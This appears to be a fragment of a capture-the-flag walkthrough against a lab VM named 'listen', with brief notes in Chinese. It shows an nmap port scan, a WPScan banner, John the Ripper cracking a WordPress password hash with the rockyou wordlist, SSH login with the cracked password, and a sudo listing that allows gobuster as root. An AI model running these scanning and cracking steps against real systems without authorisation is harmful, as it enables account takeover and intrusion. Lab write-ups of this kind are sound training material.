┌──(root㉿kali)-[/usr/share/wordlists/metasploit] └─# nmap 192.168.64.6 Starting Nmap 7.95 ( https://nmap.org ) at2025-02-1801:44 EST Nmap scan report for192.168.64.6 Host is up (0.00068s latency). Not shown: 998 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp openhttp MAC Address: CE:5E:DA:EA:E4:33 (Unknown) Nmap done: 1 IP address (1 host up) scanned in13.27seconds
WordPress Security Scanner by the WPScan Team Version 3.8.27 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________
[+] URL: http://192.168.64.6/ [192.168.64.6] [+] Started: Tue Feb 1801:44:102025
┌──(root㉿kali)-[/tmp] └─# john --wordlist=/usr/share/wordlists/rockyou.txt hash Created directory: /root/.john Using default input encoding: UTF-8 Loaded 1 password hash (phpass [phpass ($P$or$H$) 128/128 ASIMD 4x2]) Cost 1 (iteration count) is 8192forall loaded hashes Will run 4 OpenMP threads Press 'q'or Ctrl-C to abort, almost any other key for status 104567 (?) 1g 0:00:00:36 DONE (2025-02-1802:21) 0.02724g/s 20200p/s 20200c/s 20200C/s 112233669..085356 Use the "--show --format=phpass"options to displayall of the cracked passwords reliably Session completed.
跑出welcome的密码是104567 ta0的跑不出来 ssh登上welcome就能拿到user flag
1 2 3 4 5 6 7
welcome@listen:~$ sudo -l MatchingDefaults entries for welcome on listen: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User welcome may run the following commands on listen: (ALL) NOPASSWD: /usr/bin/gobuster